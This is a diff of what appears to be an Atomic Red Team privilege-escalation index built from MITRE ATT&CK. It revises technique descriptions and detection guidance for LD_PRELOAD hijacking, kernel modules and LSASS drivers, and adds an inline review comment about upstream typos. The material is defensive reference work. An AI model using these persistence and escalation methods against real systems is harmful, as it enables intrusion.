@@ -2600,8 +2675,23 @@ privilege-escalation:
of behavior that could lead to other activities, such as making network connections
for Command and Control, learning details about the environment through Discovery,
and conducting Lateral Movement. "
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - System calls
+ - Binary file metadata
+ - Process use of network
+ - WMI Objects
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.005:
technique:
@@ -2639,49 +2729,49 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-26T19:20:23.030Z'
created: '2020-03-13T11:12:18.558Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_detection: |-
- Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
-
- Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_effective_permissions:
- Administrator
- User
- SYSTEM
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
+
+ Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1068:
technique:
- id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Privilege Escalation
- description: |-
- Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
-
- When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
+ created: '2017-05-31T21:30:55.066Z'
+ modified: '2020-03-26T21:12:49.194Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1068
external_id: T1068
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-26T21:12:49.194Z'
- created: '2017-05-31T21:30:55.066Z'
+ description: |-
+ Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
+
+ When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
+ name: Exploitation for Privilege Escalation
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839
x_mitre_version: '1.2'
x_mitre_data_sources:
- Windows Error Reporting
@@ -2778,24 +2868,24 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:38:26.296Z'
+ modified: '2020-06-20T22:26:33.191Z'
created: '2020-01-14T17:18:32.126Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating
EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and
SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated
with this technique have also used SendNotifyMessage (Citation: Microsoft
SendNotifyMessage function) to trigger the associated window procedure and
eventual malicious injection. (Citation: Endgame Process Injection July 2017)'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1484:
technique:
@@ -2874,17 +2964,10 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:17:41.231Z'
created: '2019-03-07T14:10:32.650Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System access controls
+ - File system access controls
x_mitre_detection: "It is possible to detect GPO modifications by monitoring
directory service changes using Windows event logs. Several events may be
logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory
@@ -2897,10 +2980,17 @@ privilege-escalation:
value modifications, like those to SeEnableDelegationPrivilege, can also be
searched for in events associated with privileges assigned to new logons (Event
ID 4672) and assignment of user rights (Event ID 4704). "
- x_mitre_defense_bypassed:
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574:
technique:
@@ -2917,7 +3007,7 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -2929,17 +3019,15 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T17:33:44.855Z'
+ modified: '2020-06-26T16:09:59.324Z'
created: '2020-03-12T20:38:12.465Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Environment variable
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - DLL monitoring
x_mitre_detection: |-
Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
@@ -2952,13 +3040,15 @@ privilege-escalation:
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
- x_mitre_data_sources:
- - Environment variable
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - DLL monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1546.012:
technique:
@@ -3024,25 +3114,25 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T19:39:50.839Z'
created: '2020-01-24T15:05:58.384Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
+
+ Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
x_mitre_data_sources:
- API monitoring
- Windows event logs
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
- Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -3146,6 +3236,11 @@ privilege-escalation:
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
source_name: Securelist Ventir
+ - source_name: Trend Micro Skidmap
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
+ description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
+ Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
+ Retrieved June 4, 2020.
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
@@ -3165,7 +3260,7 @@ privilege-escalation:
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
- Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+ Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
type: attack-pattern
kill_chain_phases:
@@ -3173,27 +3268,28 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T16:14:29.149Z'
+ modified: '2020-06-30T21:23:15.188Z'
created: '2020-01-24T17:42:23.339Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_contributors:
- - Jeremy Galloway
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: |-
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.
- Adversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
- x_mitre_permissions_required:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Jeremy Galloway
+ - Red Canary
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
@@ -3270,29 +3366,31 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:50:36.235Z'
created: '2020-01-24T14:21:52.750Z'
- x_mitre_platforms:
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor processes for those that may be used to modify binary
+ headers. Monitor file systems for changes to application binaries and invalid
+ checksums/signatures. Changes to binaries that do not line up with application
+ updates or patches are also extremely suspicious.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- Binary file metadata
- x_mitre_detection: Monitor processes for those that may be used to modify binary
- headers. Monitor file systems for changes to application binaries and invalid
- checksums/signatures. Changes to binaries that do not line up with application
- updates or patches are also extremely suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1574.006:
technique:
id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825
description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
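Review bot: The rewritten T1574.006 description still reads `Libraries specified by LD_PRELOAD with be loaded and mapped into memory`; the intended word is `will`, i.e. `Libraries specified by LD_PRELOAD will be loaded and mapped into memory by dlopen() and mmap() respectively.` The same typo was in the removed sentence, so the upstream rewrite carried it forward. This index appears to be regenerated from the ATT&CK STIX data (the key reorders and the bundle id change point that way), so the correction belongs in the upstream attack-pattern description rather than a hand edit here, or the next regeneration will revert it. The same upstream-text issue shows in moved lines elsewhere in this diff, e.g. `Glfags` in the T1546.012 detection text and `collect elevate privileges` in the T1068 description.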
@@ -3301,6 +3399,10 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -3326,20 +3428,20 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -3405,6 +3507,23 @@ privilege-escalation:
name: bash
T1547.008:
technique:
+ created: '2020-01-24T18:38:55.801Z'
+ modified: '2020-03-25T16:52:26.567Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
+ description: |-
+ Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
+
+ Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
+ name: LSASS Driver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547.008
@@ -3425,23 +3544,6 @@ privilege-escalation:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LSASS Driver
- description: |-
- Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)
-
- Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:52:26.567Z'
- created: '2020-01-24T18:38:55.801Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -3532,20 +3634,20 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:11:45.513Z'
created: '2020-01-17T16:10:58.592Z'
- x_mitre_platforms:
- - macOS
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitor Launch Agent creation through additional plist files
and utilities such as Objective-See’s KnockKnock application. Launch Agents
also require files on disk for persistence which can also be monitored via
other file monitoring applications.
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_platforms:
+ - macOS
identifier: T1543.001
atomic_tests:
- name: Launch Agent
@@ -3635,18 +3737,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:27:49.609Z'
created: '2020-01-17T19:23:15.227Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: 'Monitor for launch daemon creation or modification through
- plist files and utilities such as Objective-See''s KnockKnock application. '
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Monitor for launch daemon creation or modification through
+ plist files and utilities such as Objective-See''s KnockKnock application. '
+ x_mitre_platforms:
+ - macOS
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -3714,12 +3816,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T22:41:14.739Z'
created: '2019-12-03T14:15:27.452Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -3730,11 +3831,12 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_permissions_required:
- - root
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ - Process monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1053.004
atomic_tests:
- name: Event Monitor Daemon Persistence
@@ -3796,21 +3898,21 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037.002:
technique:
@@ -3851,18 +3953,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.786Z'
created: '2020-01-10T16:01:15.995Z'
- x_mitre_platforms:
- - macOS
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -3916,17 +4018,17 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:03.153Z'
created: '2020-01-10T03:43:37.211Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Windows Registry
x_mitre_detection: |-
Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.
- x_mitre_data_sources:
- - Process monitoring
- - Windows Registry
- x_mitre_platforms:
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -3983,30 +4085,30 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-02-18T18:03:37.481Z'
created: '2020-02-18T18:03:37.481Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
